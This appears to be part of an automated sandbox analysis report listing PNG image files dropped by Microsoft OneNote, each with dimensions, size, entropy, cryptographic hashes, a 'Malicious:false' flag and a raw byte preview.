                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13084
                                                                                                        Entropy (8bit):7.940058639272698
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                        MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                        SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                        SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                        SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4847
                                                                                                        Entropy (8bit):7.950192613458318
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                        MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                        SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                        SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                        SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1657
                                                                                                        Entropy (8bit):7.80882577056055
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                        MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                        SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                        SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                        SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2210
                                                                                                        Entropy (8bit):7.86853667196985
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                        MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                        SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                        SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                        SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14458
                                                                                                        Entropy (8bit):7.944094738048628
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                        MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                        SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                        SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                        SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13030
                                                                                                        Entropy (8bit):7.948664903731204
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                        MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                        SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                        SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                        SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3879
                                                                                                        Entropy (8bit):7.9281351307465044
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                        MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                        SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                        SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                        SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):19235
                                                                                                        Entropy (8bit):7.944867159042578
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                        MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                        SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                        SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                        SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):7374
                                                                                                        Entropy (8bit):7.955141875077912
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                        MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                        SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                        SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                        SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):5386
                                                                                                        Entropy (8bit):7.943706538857394
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                        MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                        SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                        SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                        SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg
